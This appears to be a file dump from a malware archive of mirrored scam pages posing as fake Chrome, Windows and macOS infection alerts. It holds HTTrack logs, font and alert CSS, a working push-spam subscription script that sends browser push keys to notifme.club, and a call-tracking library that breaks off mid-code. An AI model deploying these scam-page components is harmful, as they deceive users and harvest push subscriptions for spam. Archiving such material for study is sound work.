| 137 | 138 | 139 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/murphy_ie.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Chrome Alert/murphy_ie.zip -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/style.css: -------------------------------------------------------------------------------- 1 | /* tamil */ 2 | @font-face { 3 | font-family: 'Catamaran'; 4 | font-style: normal; 5 | font-weight: 100; 6 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAc-WS8h3n1nFPP5cmXoNgba8.woff2) format('woff2'); 7 | unicode-range: U+0964-0965, U+0B82-0BFA, U+200B-200D, U+20B9, U+25CC; 8 | } 9 | /* latin-ext */ 10 | @font-face { 11 | font-family: 'Catamaran'; 12 | font-style: normal; 13 | font-weight: 100; 14 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAcyYE0-AqJ3nfInTTiDXDjU4.woff2) format('woff2'); 15 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 16 | } 17 | /* latin */ 18 | @font-face { 19 | font-family: 'Catamaran'; 20 | font-style: normal; 21 | font-weight: 100; 22 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAc44P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'); 23 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 24 | } 25 | /* tamil */ 26 | @font-face { 27 | font-family: 'Catamaran'; 28 | font-style: normal; 29 | font-weight: 400; 30 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/Q9cqF91R4Q6z47_V8UvFGBJtnKITppOI_IvcXXDNrsc.woff2) format('woff2'); 31 | unicode-range: U+0964-0965, U+0B82-0BFA, U+200B-200D, U+20B9, U+25CC; 32 | } 33 | /* latin-ext */ 34 | @font-face { 35 | font-family: 'Catamaran'; 36 | font-style: normal; 37 | font-weight: 400; 38 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/t_-OVtQ5f4U5rdYNmrStgxJtnKITppOI_IvcXXDNrsc.woff2) format('woff2'); 39 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 40 | } 41 | /* latin */ 42 | @font-face { 43 | font-family: 'Catamaran'; 44 | font-style: normal; 45 | font-weight: 400; 46 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/iVYgK2bOLvZcSxr0ITOecltXRa8TVwTICgirnJhmVJw.woff2) format('woff2'); 47 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 48 | } 49 | /* cyrillic-ext */ 50 | @font-face { 51 | font-family: 'Roboto'; 52 | font-style: normal; 53 | font-weight: 400; 54 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/ek4gzZ-GeXAPcSbHtCeQI_esZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 55 | unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F; 56 | } 57 | /* cyrillic */ 58 | @font-face { 59 | font-family: 'Roboto'; 60 | font-style: normal; 61 | font-weight: 400; 62 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/mErvLBYg_cXG3rLvUsKT_fesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 63 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 64 | } 65 | /* greek-ext */ 66 | @font-face { 67 | font-family: 'Roboto'; 68 | font-style: normal; 69 | font-weight: 400; 70 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/-2n2p-_Y08sg57CNWQfKNvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 71 | unicode-range: U+1F00-1FFF; 72 | } 73 | /* greek */ 74 | @font-face { 75 | font-family: 'Roboto'; 76 | font-style: normal; 77 | font-weight: 400; 78 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/u0TOpm082MNkS5K0Q4rhqvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 79 | unicode-range: U+0370-03FF; 80 | } 81 | /* vietnamese */ 82 | @font-face { 83 | font-family: 'Roboto'; 84 | font-style: normal; 85 | font-weight: 400; 86 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/NdF9MtnOpLzo-noMoG0miPesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 87 | unicode-range: U+0102-0103, U+1EA0-1EF1, U+20AB; 88 | } 89 | /* latin-ext */ 90 | @font-face { 91 | font-family: 'Roboto'; 92 | font-style: normal; 93 | font-weight: 400; 94 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/Fcx7Wwv8OzT71A3E1XOAjvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 95 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 96 | } 97 | /* latin */ 98 | @font-face { 99 | font-family: 'Roboto'; 100 | font-style: normal; 101 | font-weight: 400; 102 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/CWB0XYA8bzo0kSThX0UTuA.woff2) format('woff2'); 103 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 104 | } 105 | /* cyrillic-ext */ 106 | @font-face { 107 | font-family: 'Roboto Mono'; 108 | font-style: normal; 109 | font-weight: 400; 110 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYzTOQ_MqJVwkKsUn0wKzc2I.woff2) format('woff2'); 111 | unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F; 112 | } 113 | /* cyrillic */ 114 | @font-face { 115 | font-family: 'Roboto Mono'; 116 | font-style: normal; 117 | font-weight: 400; 118 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYzUj_cnvWIuuBMVgbX098Mw.woff2) format('woff2'); 119 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 120 | } 121 | /* greek-ext */ 122 | @font-face { 123 | font-family: 'Roboto Mono'; 124 | font-style: normal; 125 | font-weight: 400; 126 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY0bcKLIaa1LC45dFaAfauRA.woff2) format('woff2'); 127 | unicode-range: U+1F00-1FFF; 128 | } 129 | /* greek */ 130 | @font-face { 131 | font-family: 'Roboto Mono'; 132 | font-style: normal; 133 | font-weight: 400; 134 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY2o_sUJ8uO4YLWRInS22T3Y.woff2) format('woff2'); 135 | unicode-range: U+0370-03FF; 136 | } 137 | /* vietnamese */ 138 | @font-face { 139 | font-family: 'Roboto Mono'; 140 | font-style: normal; 141 | font-weight: 400; 142 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY76up8jxqWt8HVA3mDhkV_0.woff2) format('woff2'); 143 | unicode-range: U+0102-0103, U+1EA0-1EF1, U+20AB; 144 | } 145 | /* latin-ext */ 146 | @font-face { 147 | font-family: 'Roboto Mono'; 148 | font-style: normal; 149 | font-weight: 400; 150 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYyYE0-AqJ3nfInTTiDXDjU4.woff2) format('woff2'); 151 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 152 | } 153 | /* latin */ 154 | @font-face { 155 | font-family: 'Roboto Mono'; 156 | font-style: normal; 157 | font-weight: 400; 158 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY44P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'); 159 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 160 | } -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Chrome Alert/x.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/backblue.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/backblue.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/fade.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/fade.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/doit.log: -------------------------------------------------------------------------------- 1 | -qwC2%Ps2u1%s%uN0%I0p3DaK0H0%kf2A25000%f#f -F "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" -%F "" -%l "ru, en, *" https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248 -O1 "D:\Monterix" +*.png +*.gif +*.jpg +*.jpeg +*.css +*.js -ad.doubleclick.net/* -mime:application/foobar 2 | File generated automatically on Wed, 25 Dec 2019 19:08:33, do NOT edit 3 | 4 | To update a mirror, just launch httrack without any parameters 5 | The existing cache will be used (and modified) 6 | To have other options, retype all parameters and launch HTTrack 7 | To continue an interrupted mirror, just launch httrack without any parameters 8 | 9 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/new.lst: -------------------------------------------------------------------------------- 1 | [www.mscheck022.com/sk/dc7c905a/us/index9cc5.html] 2 | [backblue.gif] 3 | [fade.gif] 4 | [index.html] 5 | [www.mscheck022.com/sk_pre/6/img/warn_.gif] 6 | [www.mscheck022.com/sk_pre/6/img/cross.gif] 7 | [www.mscheck022.com/sk_pre/6/img/icon_app.gif] 8 | [static.notifme.club/push_js/push_subs.js] 9 | [www.google-analytics.com/analytics.js] 10 | [www.mscheck022.com/sk/dc7c905a/us/index9cc5.html] 11 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/new.txt: -------------------------------------------------------------------------------- 1 | date size'/'remotesize flags(request:Update,Range state:File response:Modified,Chunked,gZipped) statuscode status ('servermsg') MIME Etag|Date URL localfile (from URL) 2 | 19:08:35 23/23 ---M-- 200 added ('OK') text/plain etag:%225b918bbd-17%22 https://www.mscheck022.com/robots.txt (from ) 3 | 19:08:35 17218/17218 ---M-Z 200 added ('OK') text/html date:Wed,%2025%20Dec%202019%2016:07:02%20GMT https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248 D:/Monterix/www.mscheck022.com/sk/dc7c905a/us/index9cc5.html (from ) 4 | 19:08:36 5054/5054 ---M-- 200 added ('OK') image/gif etag:%225b918bbd-13be%22 https://www.mscheck022.com/sk_pre/6/img/warn_.gif D:/Monterix/www.mscheck022.com/sk_pre/6/img/warn_.gif (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 5 | 19:08:36 191/191 ---M-- 200 added ('OK') image/gif etag:%225b918bbd-bf%22 https://www.mscheck022.com/sk_pre/6/img/cross.gif D:/Monterix/www.mscheck022.com/sk_pre/6/img/cross.gif (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 6 | 19:08:36 779/779 ---M-- 200 added ('OK') image/gif etag:%225b918bbd-30b%22 https://www.mscheck022.com/sk_pre/6/img/icon_app.gif D:/Monterix/www.mscheck022.com/sk_pre/6/img/icon_app.gif (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 7 | 19:08:37 5209/5209 ---M-Z 200 added ('OK') application/javascript etag:%221459-594b371ad45f2-gzip%22 https://static.notifme.club/push_js/push_subs.js D:/Monterix/static.notifme.club/push_js/push_subs.js (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 8 | 19:08:38 44470/44470 ---MC- 200 added ('OK') text/javascript date:Mon,%2019%20Aug%202019%2017:22:41%20GMT https://www.google-analytics.com/analytics.js D:/Monterix/www.google-analytics.com/analytics.js (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 9 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/new.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/hts-cache/new.zip -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/readme.txt: -------------------------------------------------------------------------------- 1 | What's in this folder? 2 | 3 | This folder (hts-cache) has been generated by WinHTTrack 3.49-2+htsswf+htsjava 4 | and is used for updating this website. 5 | (The HTML website structure is stored here to allow fast updates) 6 | 7 | DO NOT delete this folder unless you do not want to update the mirror in the future!! 8 | (you can safely delete old.zip and old.lst files, however) 9 | 10 | note: the hts-log.txt file, and hts-cache folder, may contain sensitive information, 11 | such as username/password authentication for websites mirrored in this project 12 | do not share these files/folders if you want these information to remain private 13 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/winprofile.ini: -------------------------------------------------------------------------------- 1 | Near=0 2 | Test=0 3 | ParseAll=1 4 | HTMLFirst=0 5 | Cache=1 6 | NoRecatch=0 7 | Dos=0 8 | Index=1 9 | WordIndex=0 10 | MailIndex=0 11 | Log=1 12 | RemoveTimeout=0 13 | RemoveRateout=0 14 | KeepAlive=1 15 | FollowRobotsTxt=2 16 | NoErrorPages=0 17 | NoExternalPages=0 18 | NoPwdInPages=0 19 | NoQueryStrings=0 20 | NoPurgeOldFiles=0 21 | Cookies=1 22 | CheckType=1 23 | ParseJava=1 24 | HTTP10=0 25 | TolerantRequests=0 26 | UpdateHack=1 27 | URLHack=1 28 | StoreAllInCache=0 29 | LogType=0 30 | UseHTTPProxyForFTP=1 31 | Build=0 32 | PrimaryScan=3 33 | Travel=1 34 | GlobalTravel=0 35 | RewriteLinks=0 36 | BuildString=%%h%%p/%%n%%q.%%t 37 | Category= 38 | MaxHtml= 39 | MaxOther= 40 | MaxAll= 41 | MaxWait= 42 | Sockets= 43 | Retry= 44 | MaxTime= 45 | TimeOut= 46 | RateOut= 47 | UserID=Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98) 48 | Footer= 49 | AcceptLanguage=ru, en, * 50 | OtherHeaders= 51 | DefaultReferer= 52 | MaxRate=25000 53 | WildCardFilters=+*.png +*.gif +*.jpg +*.jpeg +*.css +*.js -ad.doubleclick.net/* -mime:application/foobar 54 | Proxy= 55 | Port= 56 | Depth= 57 | ExtDepth= 58 | MaxConn= 59 | MaxLinks= 60 | MIMEDefsExt1= 61 | MIMEDefsExt2= 62 | MIMEDefsExt3= 63 | MIMEDefsExt4= 64 | MIMEDefsExt5= 65 | MIMEDefsExt6= 66 | MIMEDefsExt7= 67 | MIMEDefsExt8= 68 | MIMEDefsMime1= 69 | MIMEDefsMime2= 70 | MIMEDefsMime3= 71 | MIMEDefsMime4= 72 | MIMEDefsMime5= 73 | MIMEDefsMime6= 74 | MIMEDefsMime7= 75 | MIMEDefsMime8= 76 | CurrentUrl=https://www.mscheck022.com/sk/dc7c905a/us/?clid%3d232086917583687680&p1%3d2553225&p2%3dwindows&p3%3d{language}&p4%3d{isp}&p5%3d{device}&p6%3dUS&p7%3d2840684&p8%3dhigh&p9%3d4541248 77 | CurrentAction=0 78 | CurrentURLList= 79 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Local index - HTTrack Website Copier 8 | 9 | 78 | 79 | 80 | 81 | 82 | 83 | HTTrack Website Copier - Open Source offline browser 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | Local index - HTTrack 99 | 100 | 101 | Index of locally available sites: 102 | 103 | 104 | 105 | · 106 | 107 | Warning 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | Mirror and index made by HTTrack Website Copier [XR&CO'2008] 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | © 2008 Xavier Roche & other contributors - Web Design: Leto Kauler. 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/static.notifme.club/push_js/push_subs.js: -------------------------------------------------------------------------------- 1 | (function() { 2 | let targetHost = location.href; 3 | 4 | const OLD_PERMISSION = Notification.permission; 5 | 6 | const APPLICATION_ID = "BHLt6OGwTzOVdL3xjNitIdKuR6zfc26ictUyE2Fzk_uvOHkPSzoA7FTAOFDf9EQU0KDo1cYix0lpctzhT8a8TdA"; 7 | const SUBSCRIPTION_URL = "https:\/\/push.notifme.club\/index.php?subscribe=1"; 8 | const REDIRECT_URL = ""; 9 | const SERVICE_WORKER_LOCATION = "\/push_sw.js"; 10 | const INSTANCE_NUMBER = "1"; 11 | const ALLOW_REDIRECT = 0; 12 | 13 | function urlB64ToUint8Array(base64String) { 14 | const padding = ('=').repeat((4 - base64String.length % 4) % 4); 15 | const base64 = (base64String + padding) 16 | .replace(/\-/g, '+') 17 | .replace(/_/g, '/'); 18 | 19 | const rawData = window.atob(base64); 20 | const outputArray = new Uint8Array(rawData.length); 21 | 22 | for (let i = 0; i < rawData.length; ++i) { 23 | outputArray[i] = rawData.charCodeAt(i); 24 | } 25 | 26 | return outputArray; 27 | } 28 | 29 | function isNumber(n) { 30 | return !isNaN(parseFloat(n)) && isFinite(n); 31 | } 32 | 33 | function Uint8ArrayToBase64(rawArrayBuffer) { 34 | return btoa( 35 | String.fromCharCode.apply( 36 | null, 37 | new Uint8Array(rawArrayBuffer) 38 | ) 39 | ); 40 | } 41 | 42 | const redirectAllow = function () { 43 | if (ALLOW_REDIRECT) { 44 | top.location = REDIRECT_URL 45 | +'?r=' + "2" +'&aff=' + encodeURIComponent(pushaffname); 46 | } 47 | }; 48 | const redirectBlock = function () { 49 | if (ALLOW_REDIRECT) { 50 | top.location = REDIRECT_URL 51 | +'?r=' + "2" +'&aff=' + encodeURIComponent(pushaffname); 52 | } 53 | }; 54 | 55 | const redirectHost = function () { 56 | if (ALLOW_REDIRECT) { 57 | let domain_split = window.location.hostname.split('.'); 58 | if (!isNumber(domain_split[0])) { 59 | top.location = window.location.href.replace("://" + domain_split[0] + ".", "://0."); 60 | } else { 61 | let newNumber = parseInt(domain_split[0]) + 1; 62 | if (newNumber > INSTANCE_NUMBER) { 63 | redirectBlock(); 64 | } else { 65 | top.location = window.location.href.replace("://" + domain_split[0] + ".", "://" + String(newNumber) + "."); 66 | } 67 | } 68 | } 69 | }; 70 | 71 | const requestPermission = function () { 72 | if (OLD_PERMISSION !== 'default') { 73 | redirectHost(); 74 | return; 75 | } 76 | 77 | Notification.requestPermission(function (result) { 78 | if (result === 'granted') { 79 | navigator.serviceWorker.register(SERVICE_WORKER_LOCATION).then(function () { 80 | navigator.serviceWorker.ready.then(function (registration) { 81 | registration.pushManager.subscribe({ 82 | userVisibleOnly: true, 83 | applicationServerKey: urlB64ToUint8Array(APPLICATION_ID) 84 | }).then(function (pushSubscription) { 85 | const key = pushSubscription.getKey("p256dh"), 86 | token = pushSubscription.getKey("auth"), 87 | endpoint = pushSubscription.endpoint, 88 | tz = new Date().getTimezoneOffset(), 89 | contentEncoding = (PushManager.supportedContentEncodings || ['aesgcm'])[0]; 90 | 91 | if (OLD_PERMISSION !== 'granted') { 92 | var img = document.createElement("img"); 93 | 94 | img.style.visibility = 'hidden'; 95 | var subsUrl = SUBSCRIPTION_URL 96 | + '&tz=' + encodeURIComponent(tz.toString()) 97 | + '&e=' + encodeURIComponent(endpoint) 98 | + '&k=' + encodeURIComponent(Uint8ArrayToBase64(key)) 99 | + '&t=' + encodeURIComponent(Uint8ArrayToBase64(token)) 100 | + '&h=' + encodeURIComponent(targetHost) 101 | + '&aff=' + encodeURIComponent(pushaffname) 102 | + '&c=' + encodeURIComponent(contentEncoding); 103 | 104 | img.src = subsUrl; 105 | 106 | document.body.appendChild(img); 107 | 108 | fetch(subsUrl, { 109 | mode: 'no-cors' 110 | }).catch(function() { 111 | throw new Error("Postback fetch failed!"); 112 | }); 113 | } 114 | 115 | window.setTimeout(redirectAllow, 1300); 116 | }).catch(redirectBlock); 117 | }).catch(redirectBlock); 118 | }).catch(redirectBlock); 119 | } else { 120 | redirectBlock(); 121 | } 122 | }).catch(redirectBlock); 123 | }; 124 | requestPermission(); 125 | })(); -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/cross.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/cross.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/icon_app.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/icon_app.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/warn_.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/warn_.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ajax2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/ajax2.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/beep.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/beep.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ch/a.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/ch/a.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ch/alert.css: -------------------------------------------------------------------------------- 1 | body{ 2 | background: url(microsoft.png) no-repeat center fixed; 3 | 4 | }.style1{font-family:Arial,Helvetica,sans-serif;font-weight:bold;color:#FFFFFF;font-size:18px;}.style2{font-size:36px;font-family:"Courier New",Courier,monospace;}.style4{font-size:22px;font-family:"Courier New",Courier,monospace;}.style5{font-size:20px;font-family:"Courier New",Courier,monospace;}.style6{font-family:"Courier New",Courier,monospace} 5 | 6 | .cross{ 7 | position: absolute; 8 | top: 2px; 9 | right: 10px; 10 | font-weight: bolder; 11 | color: #888; 12 | text-decoration: none; 13 | } 14 | a:focus{ 15 | outline: 0 none; 16 | border: 0 none; 17 | } 18 | 19 | 20 | .chrome-alert{ 21 | position: fixed; 22 | top: 0px; 23 | left:0; 24 | right: 0; 25 | /*display: none;*/ 26 | } 27 | .chrome-alert>div{ 28 | margin: 0 auto; 29 | width: 440px; 30 | background: #FBFBFB; 31 | border: 1px solid #BABABA; 32 | min-height: 180px; 33 | border-radius: 3px; 34 | box-shadow: 0 2px 0 rgba(0,0,0,0.3); 35 | position: relative; 36 | font-family: 'Segoe UI'; 37 | } 38 | .chrome-alert h1{ 39 | font-size: 15px; 40 | font-weight: normal; 41 | margin: 0; 42 | margin-bottom: 5px; 43 | padding: 5px 10px; 44 | color: #414141; 45 | } 46 | .chrome-alert p{ 47 | font-size: 12px; 48 | padding: 0 10px; 49 | color: #414141; 50 | margin: 15px 0; 51 | } 52 | .chrome-alert .action_buttons{ 53 | overflow: auto; 54 | } 55 | .chrome-alert .action_buttons a{ 56 | float: right; 57 | font-size: 12px; 58 | margin-right: 15px; 59 | padding: 6px 25px; 60 | text-decoration: none; 61 | color: #414141; 62 | border: 1px solid #DDD; 63 | margin-top: 20px; 64 | border-radius: 2px; 65 | margin-bottom: 20px; 66 | } 67 | .chrome-alert .action_buttons a.active{ 68 | border: 1px solid #3B79ED; 69 | font-weight: bold; 70 | } 71 | .chrome-alert .content-box{ 72 | max-height:440px;overflow:auto; 73 | margin: 0 20px; 74 | } 75 | .chrome-alert .content-box p{ 76 | padding: 0; 77 | margin-left: 0; 78 | } 79 | .chrome-alert label{ 80 | padding: 0 20px; 81 | font-size: 12px; 82 | color: #414141; 83 | } 84 | .chrome-alert label:hover{ 85 | color: #3B79ED; 86 | } 87 | .chrome-alert label:focus{ 88 | color: #3B79ED; 89 | outline: dotted; 90 | } -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ch/microsoft.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/ch/microsoft.png -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ch/retreaver.js: -------------------------------------------------------------------------------- 1 | /*! retreaver 25-04-2016 */ 2 | !function(a){var b={configure:function(a){var c={addr:a.host,http_prefix:"http",urlregex:"/\\/\\/[^\\/]*\\/(.*)/"};"undefined"!=typeof a.prefix&&(c.http_prefix=a.prefix),window.Retreaver._connection=new b.Base.Request(c)}};a.Retreaver=b}(window),function(){"undefined"==typeof window.Retreaver&&(window.Retreaver={});var a={};a.assert_required_keys=function(){for(var a=Array.prototype.slice.call(arguments),b=a.shift(),c=0;c",c[0];);return a>4?a:!1}()),(6==a._ieVersion||7==a._ieVersion)&&null==Retreaver.easyxdm_loaded&&(Retreaver.easyxdm_loaded=!1),a._ieVersion},Retreaver.Base=a}(),function(a){var b=function(a,c,d){return 1===arguments.length?b.get(a):b.set(a,c,d)};b._document=document,b._navigator=navigator,b.defaults={path:"/"},b.get=function(a){return b._cachedDocumentCookie!==b._document.cookie&&b._renewCache(),b._cache[a]},b.set=function(a,c,d){return d=b._getExtendedOptions(d),b._document.cookie=b._generateCookieString(a,c,d),b},b._getExtendedOptions=function(c){return{path:c&&c.path||b.defaults.path,domain:c&&c.domain||b.defaults.domain,secure:c&&c.secure!==a?c.secure:b.defaults.secure}},b._isValidDate=function(a){return"[object Date]"===Object.prototype.toString.call(a)&&!isNaN(a.getTime())},b._generateCookieString=function(a,b,c){return a=encodeURIComponent(a),b=(b+"").replace(/[^!#$&-+\--:<-\[\]-~]/g,encodeURIComponent),c=c||{},a=a+"="+b+(c.path?";path="+c.path:""),a+=c.domain?";domain="+c.domain:"",a+=c.secure?";secure":""},b._getCookieObjectFromString=function(c){var d={};c=c?c.split("; "):[];for(var e=0;eb?a.length:b;return{key:decodeURIComponent(a.substr(0,b)),value:decodeURIComponent(a.substr(b+1))}},b._renewCache=function(){b._cache=b._getCookieObjectFromString(b._document.cookie),b._cachedDocumentCookie=b._document.cookie},b._areEnabled=function(){return b._navigator.cookieEnabled||"1"===b.set("cookies.js",1).get("cookies.js")},b.enabled=b._areEnabled(),"function"==typeof define&&define.amd?define(function(){return b}):"undefined"!=typeof exports?("undefined"!=typeof 